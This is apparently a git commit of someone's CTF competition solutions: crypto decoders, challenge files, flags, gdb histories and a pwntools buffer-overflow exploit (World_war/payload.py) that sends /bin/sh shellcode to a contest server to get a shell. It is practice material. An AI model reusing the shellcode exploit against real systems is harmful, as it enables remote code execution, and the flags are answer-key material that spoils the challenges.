commit 9601394f3e2886852b065bfd96787777b5f6e8df Author: Christopher Yu Date: Sun Mar 3 22:56:56 2019 +0800 first commit diff --git a/AsgamaCTF/Crypto/1byte_ROXy/decode.py b/AsgamaCTF/Crypto/1byte_ROXy/decode.py new file mode 100644 index 0000000..abc8fcc --- /dev/null +++ b/AsgamaCTF/Crypto/1byte_ROXy/decode.py @@ -0,0 +1,12 @@ +from pwn import * + +cipher = "e7c1cdc1e3f4e6dbcfcec5ffc2d9d4c5ffd8cfd2d29f9fdd" + +cipher = cipher.decode('hex') + +for i in range(256): + plain = xor(cipher, i) + if "GamaCTF{" in plain: + print plain + break + diff --git a/AsgamaCTF/Crypto/Capek/base b/AsgamaCTF/Crypto/Capek/base new file mode 100644 index 0000000..7e78dfa --- /dev/null +++ b/AsgamaCTF/Crypto/Capek/base @@ -0,0 +1 @@ +Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFppVkZaeVZtMTRTMk15VGtsalJtaG9UV3N3ZUZadGNFZFRNazE1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpYZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMWRyV25kV01ERkZVbFJHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRmhWTW5SM1ZqSktWVkpZWkZwV1JWcHlWVEJhVDJOc2NFaGpSazVYVWpOb2IxWXhaRFJWTVVsNVZXNU9XR0pIVWxsWmJHaFRWMFpTVjJGRlRsTmlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1WFJVcElWbXBLTkZReFdsaFRhMlJxVW14d1dGbHNhRk5OTVZweFUydDBWMVpyY0ZwWGExcDNZa2RGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZVYkdocFZqSm9lbGRYZUc5aU1rbDRWMjVTVGxkSFVsWlVWbHBYVGxaV2RHUkhkRmROVjFKSldWVmFjMWR0U2tkWGJXaGFUVzVvV0ZreFdrZFdWa3B6VkdzMVYwMVZiekZXYlhCTFRrWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTlc5a2JGcEhWbTA1VWsxWFVsaFdNV2h2V1ZaS1IxTnNaRlZXYkhCNlZHdGFWbVZYVWtoa1JtaFRUVWhDU2xac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGbHFTa1psUm1SWldrVTFWMVpzY0ZWWFYzUnJWVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUkVKWFRWWndlVll5ZUhkWGJGcFhZMGhLVjFaRldreFdNVnBIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaGhVMFphVmxscldrdGpSbHB4VkcwNVYxWnNjRWhYVkU1dllWVXhXRlZ1Y0ZkTlYyaDJWMVphUzFJeFRuVlJiRlpYVFRGS05sWkdVa2RWTVZwMFVtdG9VRlp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrcDFXa1pPVGxacmNEVldSM2hoVkRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHWkZkWGJFcHNWbXR3ZVZkcldtOWhWMFkyVm01b1YxWkZTbkpVYTFwclVqRldjMXBHYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXlSa2hoUlRWWFltdEtNbFp0TVRCVk1VMTRWVmhzVlZkSGVGWlpWRVozWVVaV2NWTnRPVmRTYkVwWlZGWmpOV0pIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFoxWTBaa1RsWXlhREpXYWtKclV6RmtWMVp1U2xCV2JIQndWakJhUzA1c1drZFZhMlJXVFdzeE5GWXlOVk5oTVVwMFZXNUNWMkpIYUVSVWJGcHJWbFpHZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp0ZUhkTk1XeFdWMjVrVTJKSVFrZFVNVlUxWVZaS1dWRllaRmhpUmxwb1ZrUktSMVl4VW5KWGJGSnBWbFp3V1ZaR1l6RmlNV1JIWWtoR1ZHRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQllWVEkxYjFZeFdYcGhTRXBhWVd0YWNsVnFSbGRqTWtaR1QxWmtWMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWZDRNVmt3VmpCV01rcEhZa1JhV2xaWGFFeFdNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZVd1ZrdE5iRnB4VW0xR1ZrMVZNVFJXVm1oelZsWmtTR0ZIYUZaTlJuQm9WbTE0YzJOc1pISmtSM0JUWWtad05GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV2FrNVRWRVpzVlZGWWFGTldhM0I2VmtkNFlWVXlTa1pYV0hCWFZsWndSMVF4V2tOVmJFSlZUVVF3UFE9PQ== \ No newline at end of file diff --git a/AsgamaCTF/Crypto/Capek/decryptloop.py b/AsgamaCTF/Crypto/Capek/decryptloop.py new file mode 100644 index 0000000..b9fe30f --- /dev/null +++ b/AsgamaCTF/Crypto/Capek/decryptloop.py @@ -0,0 +1,10 @@ +from base64 import * +with open("base", "r") as file: + text = file.read() + decoded = "" + while True: + decoded = b64decode(text) + text = decoded + if(text.find("CTF{") != -1): + break + print text diff --git a/AsgamaCTF/Reverse/XOR_in_reverse/Xrev b/AsgamaCTF/Reverse/XOR_in_reverse/Xrev new file mode 100755 index 0000000..e402fa5 Binary files /dev/null and b/AsgamaCTF/Reverse/XOR_in_reverse/Xrev differ diff --git a/AsgamaCTF/Reverse/pwd/.gdb_history b/AsgamaCTF/Reverse/pwd/.gdb_history new file mode 100644 index 0000000..8122cbd --- /dev/null +++ b/AsgamaCTF/Reverse/pwd/.gdb_history @@ -0,0 +1,194 @@ +b *main +r +ni +r +ni +si +ni +si +ni +pdisas c +b *0x0000000000400761 +r +ni +si +ni +r +ni +si +ni +ni +r +r +r < $(python -c "print '\xde\x00\x00\x00'") +r <<< $(python -c "print '\xde\x00\x00\x00'") +ni +r <<< $(python -c "print '\xde\x00\x00\x00'") +ni +r <<< $(python -c "print '\xbe\x00\x00\x00'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x00\x02'") +ni +si +ni +r <<< $(python -c "print '\x20\x00\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print '\x02\x00\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xef\xee\xbe\x1d'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\x1d'") +ni +pdisas c +b *0x0000000000400746 +r <<< $(python -c "print '\xef\xee\xbe\xad\x22'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x11\x11\x11\x11\x1d'") +ni +r <<< $(python -c "print '\x11\x11\x11\x11\x1d\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 4 + '\x1d'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a * 8") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print 'a' + '\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print 'a' * 8 + '\xef\xee\xbe\xad\xde'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d\x1d'") +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xde\x1d\x1d\x1d'") +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 6 + '\x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + 'a' * 7") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\x00' * 6") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\xd0' * 6") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7") +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 3 + '\x00' * 4 + '\x1d'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'") +ni +si +ni +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'* 7") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 20") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 40") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00'*7 + '\x1e'") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 7") +ni +si +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14") +ni +si +ni +r <<< $(python -c "print '\x00' + '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13") +ni +si +ni +r <<< $(python -c "print '\xde' + '\x00' + '\x1e' * 13") +ni +r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13") diff --git a/AsgamaCTF/Reverse/pwd/decode.py b/AsgamaCTF/Reverse/pwd/decode.py new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/AsgamaCTF/Reverse/pwd/decode.py @@ -0,0 +1 @@ + diff --git a/AsgamaCTF/Reverse/pwd/pwdrev b/AsgamaCTF/Reverse/pwd/pwdrev new file mode 100755 index 0000000..e0bf548 Binary files /dev/null and b/AsgamaCTF/Reverse/pwd/pwdrev differ diff --git a/CJ2018/Pwn/Dionysus/dionysus_client b/CJ2018/Pwn/Dionysus/dionysus_client new file mode 100755 index 0000000..57fff1a Binary files /dev/null and b/CJ2018/Pwn/Dionysus/dionysus_client differ diff --git a/CJ2018/Pwn/Dionysus/dionysus_server b/CJ2018/Pwn/Dionysus/dionysus_server new file mode 100755 index 0000000..ffb766e Binary files /dev/null and b/CJ2018/Pwn/Dionysus/dionysus_server differ diff --git a/GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip b/GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip new file mode 100644 index 0000000..c7be98c Binary files /dev/null and b/GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip differ diff --git a/GKSK/Crypto/GKSK_Crypto_Service/decrypt.py b/GKSK/Crypto/GKSK_Crypto_Service/decrypt.py new file mode 100644 index 0000000..9b57e48 --- /dev/null +++ b/GKSK/Crypto/GKSK_Crypto_Service/decrypt.py @@ -0,0 +1,26 @@ +import base64 + +secret_out = '' +secret_str = ''.join("gksk-secret-code".split("-")) +for count, loop in enumerate(secret_str): + if count % 2 == 0: + secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop]) + else: + secret_out += loop + +print secret_out + +enc = open("flag.enc", "r").read() +shift_key = 0 +while True: + shift_key += 1 + cipher = base64.b64decode(enc) + alphabet = secret_out * 50 + shifted_alphabet = alphabet[shift_key:] + alphabet[:shift_key] + flag = '' + for i in range(len(cipher[:-1])): + flag += chr((ord(cipher[i]) ^ shift_key) - ord(shifted_alphabet[i])) + + if "GKSK{" in flag: + print flag + break diff --git a/GKSK/Crypto/GKSK_Crypto_Service/flag.enc b/GKSK/Crypto/GKSK_Crypto_Service/flag.enc new file mode 100644 index 0000000..3898e75 --- /dev/null +++ b/GKSK/Crypto/GKSK_Crypto_Service/flag.enc @@ -0,0 +1 @@ +kraiqvy1qe+2oqi2kbSftqS3/KmknKHv7+/rwbj/pK+h8+XS8p+topm17b72sK2b8q6go/ygmaijtfaxoZipm67vv6un8Zu2r7ag4fLHqZGz9Jzxkbet/qG2t5Gpk/ywmLWg/8/LwcyftKmuqbycqZC1rKqzsLWdtqys79ujqqGprLDjoaacor2qqqqgvJHuo7Co0OebveWToojt9s6otrWQqe+psq6h7baa/qG2t5Gpk//+BQ== \ No newline at end of file diff --git a/GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py b/GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py new file mode 100755 index 0000000..d66b5f1 --- /dev/null +++ b/GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py @@ -0,0 +1,97 @@ +#!/usr/bin/python2.7 +# -*- coding: utf-8 -*- + +import sys +import random +import base64 + +def banner(): + return ''' + + Welcome to our brand new crypto service + ________ _______ __ __ ____________ ______ __________ _____ __________ _ __________________ + / ____/ //_/ ___// //_/ / ____/ __ \ \/ / __ \/_ __/ __ \ / ___// ____/ __ \ | / / _/ ____/ ____/ + / / __/ ,< \__ \/ ,< / / / /_/ /\ / /_/ / / / / / / / \__ \/ __/ / /_/ / | / // // / / __/ +/ /_/ / /| |___/ / /| | / /___/ _, _/ / / ____/ / / / /_/ / ___/ / /___/ _, _/| |/ // // /___/ /___ +\____/_/ |_/____/_/ |_| \____/_/ |_| /_/_/ /_/ \____/ /____/_____/_/ |_| |___/___/\____/_____/ + version [v2.1.19] + ''' + +def print_usage(script_argv): + print '[==USAGE==]\n' + print 'Encrypt File \t: %s -e [plaintext_file] [key]' % script_argv + print 'Decrypt File \t: %s -d [encrypted_file] [key]' % script_argv + print 'Generate Key \t: %s -g' % script_argv + print 'Help \t\t: %s -h\n' % script_argv + +def shift_key(): + key = random.randint(0x1, 0xff) + return key + +def shuffle_secret(): + secret_out = '' + secret_str = ''.join('gksk-secret-code'.split('-')) + for count,loop in enumerate(secret_str): + if count % 2 == 0: + secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop]) + else: + secret_out += loop + return secret_out + +def encryption(plain, shift): + try: + ciphertext = '' + length_msg = 50 + with open(plain, 'rb') as bin: + data = bin.read() + + shift = int(shift) + alphabet = shuffle_secret() * length_msg + shifted_alphabet = alphabet[shift:] + alphabet[:shift] + for a, b in zip(data, shifted_alphabet): + ciphertext += chr(ord(a) + ord(b) ^ shift) + + with open(plain + '.enc', 'wb') as bin: + bin.write(base64.b64encode(ciphertext)) + + except ValueError: + print "ValueError : Range key [0-255]" + exit() + +def decryption(enc_file, key): + with open(enc_file, 'rb') as bin: + data = bin.read() + + '''NOT IMPLEMENTED YET''' + + with open(enc_file + '.trial', 'wb') as bin: + bin.write(data) + + +def main(): + print banner() + script_argv = sys.argv[0] + try: + mode = sys.argv[1] + if mode == '-e': + plaintext_file = sys.argv[2] + key = sys.argv[3] + encryption(plaintext_file, key) + print "\nSECRET KEY : ", shuffle_secret() + print '\nThankyou for using our service :)\n' + elif mode == '-d': + encrypted_file = sys.argv[2] + key = sys.argv[3] + decryption(encrypted_file, key) + print '\nNot implemented yet. Upgrade to premium, only $99999\n' + elif mode == '-g': + print 'Key : ', shift_key() + elif mode == '-h': + print_usage(script_argv) + else: + print_usage(script_argv) + except IndexError: + print_usage(script_argv) + +if __name__ == '__main__': + main() diff --git a/GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt b/GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt new file mode 100644 index 0000000..c43bd64 --- /dev/null +++ b/GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt @@ -0,0 +1 @@ +GKSK{4re_Y0u_53ri0usly_checking_f0r_b3t4_t3sT?} diff --git a/GKSK/Joy/Hack_The_Game_v0.0.1/version001 b/GKSK/Joy/Hack_The_Game_v0.0.1/version001 new file mode 100755 index 0000000..888e5c2 Binary files /dev/null and b/GKSK/Joy/Hack_The_Game_v0.0.1/version001 differ diff --git a/GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py b/GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py new file mode 100644 index 0000000..67a3b47 --- /dev/null +++ b/GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py @@ -0,0 +1,4 @@ +import base64 + +cheat = "PlayerLevel=1;PlayerExp=1;PlayerHP=100;PlayerAtk=987654321;PlayerDef=987654321;PlayerName=ar" +print base64.b64encode(cheat) diff --git a/GKSK/Joy/Hack_The_Game_v0.0.2/test.py b/GKSK/Joy/Hack_The_Game_v0.0.2/test.py new file mode 100644 index 0000000..834da71 --- /dev/null +++ b/GKSK/Joy/Hack_The_Game_v0.0.2/test.py @@ -0,0 +1,12 @@ +cheat = "UGxheWVyTGV2ZWw9OTk5OTk5OTk5O1BsYXllckV4cD05OTk5OTk5OTk5O1BsYXllckhQPTk4NzY1NDMyMTtQbGF5ZXJBdGs9OTg3NjU0MzIxO1BsYXllckRlZj05ODc2NTQzMjE7UGxheWVyTmFtZT1Cb2Rv" +alphabet = "abcdefghijklmnopqrstuvwxyz" +newcheat = "" +for i in cheat: + if i in alphabet.upper(): + newcheat += i.lower() + elif i in alphabet.lower(): + newcheat += i.upper() + else: + newcheat += i + +print newcheat diff --git a/GKSK/Joy/Hack_The_Game_v0.0.2/version002 b/GKSK/Joy/Hack_The_Game_v0.0.2/version002 new file mode 100755 index 0000000..7105e1b Binary files /dev/null and b/GKSK/Joy/Hack_The_Game_v0.0.2/version002 differ diff --git a/GKSK/Pwn/World_war/.gdb_history b/GKSK/Pwn/World_war/.gdb_history new file mode 100644 index 0000000..001db2a --- /dev/null +++ b/GKSK/Pwn/World_war/.gdb_history @@ -0,0 +1,3 @@ +pattern create 500 +r +pattern offset 0x65414149 diff --git a/GKSK/Pwn/World_war/payload.py b/GKSK/Pwn/World_war/payload.py new file mode 100644 index 0000000..e93393e --- /dev/null +++ b/GKSK/Pwn/World_war/payload.py @@ -0,0 +1,15 @@ +shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" +from pwn import * + +r = remote("180.250.7.183", 51137) +r.recvuntil("coordinate : ") + +buff = r.recvline() +buff = buff[:10] +buff = int(buff, 16) +buff = p32(buff) + +payload = shellcode + "a" * (72-len(shellcode)) + buff + +r.sendline(payload) +r.interactive() diff --git a/GKSK/Pwn/World_war/peda-session-world_war.txt b/GKSK/Pwn/World_war/peda-session-world_war.txt new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/GKSK/Pwn/World_war/peda-session-world_war.txt @@ -0,0 +1 @@ + diff --git a/GKSK/Pwn/World_war/world_war b/GKSK/Pwn/World_war/world_war new file mode 100755 index 0000000..e453371 Binary files /dev/null and b/GKSK/Pwn/World_war/world_war differ diff --git a/GKSK/Reverse/Decimal1.0/Decimal_1.0 b/GKSK/Reverse/Decimal1.0/Decimal_1.0 new file mode 100755 index 0000000..8890656 Binary files /dev/null and b/GKSK/Reverse/Decimal1.0/Decimal_1.0 differ diff --git a/IDCC/Crypto/DecryptME/decrypt.py b/IDCC/Crypto/DecryptME/decrypt.py new file mode 100644 index 0000000..ae8a351 --- /dev/null +++ b/IDCC/Crypto/DecryptME/decrypt.py @@ -0,0 +1,35 @@ +# Python2 ver. +# If you use Python3 interpreter, the trouble will be in print format + +# [KSL Playground][Crypto][IDCC2018 DecryptME] written by Mr. Goodnight +# Link: https://euectf.stikom-bali.ac.id/challenges#[IDCC]%20DecryptME +# Flag: IDCC{S1mpl3_4nd_stR4ight} + +from base64 import * + +# Encryption algorithm +# ciphertext = plaintext + keys +with open('./enkripsi', mode = 'r') as f: + ciphertext = f.read() + +# plaintext = ciphertext - keys +# Make my own function to decrypt the ciphertext +def decrypt(ciphertext, keys): + plaintext = "" + for num,char in enumerate (ciphertext): + plaintext += chr((ord(char) - ord(keys[num % len(keys)])) % 127) + + return plaintext + +# keys = ciphertext - plaitext +# Find the key by using known string attack +# Then I found out that the key is raja +known_string = b64encode("IDCC{") +keys = "" +for num,char in enumerate (known_string): + keys += chr((ord(ciphertext[num]) - ord(char)) % 127) + +# Run the decrypt function the decode it +keys = "raja" +flag = b64decode(decrypt(ciphertext, keys)) +print ("Flag: {f}".format(f = flag)) diff --git a/IDCC/Crypto/DecryptME/enkripsi b/IDCC/Crypto/DecryptME/enkripsi new file mode 100644 index 0000000..1eebaad --- /dev/null +++ b/IDCC/Crypto/DecryptME/enkripsi @@ -0,0 +1 @@ +F7=&D_6@9YU&9HA) MK9HL=RMSY3( diff --git a/IDCC/Crypto/DecryptME/test.py b/IDCC/Crypto/DecryptME/test.py new file mode 100644 index 0000000..e678522 --- /dev/null +++ b/IDCC/Crypto/DecryptME/test.py @@ -0,0 +1,35 @@ +from base64 import * +def enkripsi(plain, keys): + enc = [] + plain = b64encode(plain) + for i, l in enumerate(plain): + kunci = ord(keys[i % len(keys)]) + teks = ord(l) + enc.append(chr((teks + kunci) % 127)) + #enc = teks + kunci + return ''.join(enc) + +def findKey(): + key = [] + known = b64encode("IDCC{") + file = open("enkripsi", "rb") + file = file.read() + for i, l in enumerate(known): + kunci = ord(file[i]) + teks = ord(l) + key.append((chr((kunci - teks) % 127))) + return ''.join(key) + +def decryption(): + key = "raja" + flag = [] + file = open("enkripsi", "r").read() + for i, l in enumerate(file): + kunci = ord(key[i % len(key)]) + cipher = ord(l) + flag.append(chr((cipher - kunci) % 127)) + return ''.join(flag) + + +print findKey() +print b64decode(decryption()) diff --git a/SlashRoot/Crypto/RSA_Token_Generator/payload.py b/SlashRoot/Crypto/RSA_Token_Generator/payload.py new file mode 100644 index 0000000..6a73688 --- /dev/null +++ b/SlashRoot/Crypto/RSA_Token_Generator/payload.py @@ -0,0 +1,29 @@ +from pwn import * + +r = remote("103.200.7.156", 1003) + +r.recvuntil(">>> ") +r.sendline("2") + +for i in range(5): + r.recvuntil("e = ") + e = r.recvline() + e = int(e[:-1]) + + r.recvuntil("n = ") + n = r.recvline() + n = int(n[:-1]) + + r.recvuntil("c = ") + c = r.recvline() + c = int(c[:-1]) + + p = 1000 + while True: + if(pow(p, e, n) == c): + break + p +=1 + r.sendline(str(p)) + print "p = ", p + +r.interactive() diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png new file mode 100644 index 0000000..1a59886 Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png differ diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png new file mode 100644 index 0000000..db20324 Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png differ diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png new file mode 100644 index 0000000..43c12fa Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png differ diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png new file mode 100644 index 0000000..952914e Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png differ diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png new file mode 100644 index 0000000..947480f Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png differ diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png new file mode 100644 index 0000000..1cf3cb8 Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png differ diff --git a/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png new file mode 100644 index 0000000..7dc3342 Binary files /dev/null and b/TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png differ diff --git a/TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png b/TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png new file mode 100644 index 0000000..630d220 Binary files /dev/null and b/TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png differ diff --git a/TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png b/TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png new file mode 100644 index 0000000..9ab6b7f Binary files /dev/null and b/TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png differ diff --git a/TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png b/TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png new file mode 100644 index 0000000..48429eb Binary files /dev/null and b/TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png differ diff --git a/TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png b/TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png new file mode 100644 index 0000000..bf28894 Binary files /dev/null and b/TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png differ diff --git a/TAMUCTF/Crypto/Smile/decoder.py b/TAMUCTF/Crypto/Smile/decoder.py new file mode 100644 index 0000000..8237950 --- /dev/null +++ b/TAMUCTF/Crypto/Smile/decoder.py @@ -0,0 +1,13 @@ +from base64 import * + +enc = "XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH" +flag = b64decode(enc) +key = ":)" +newflag = [] +for i, l in enumerate(flag): + kunci = ord(key[i % len(key)]) + cipher = ord(l) + newflag.append(chr(kunci ^ cipher)) + +newflag = ''.join(newflag) +print newflag diff --git a/TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png new file mode 100644 index 0000000..6176a40 Binary files /dev/null and b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png differ diff --git a/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png new file mode 100644 index 0000000..f589d54 Binary files /dev/null and b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png differ diff --git a/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png b/TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png new file mode 100644 index 0000000..2c1cbde Binary files /dev/null and 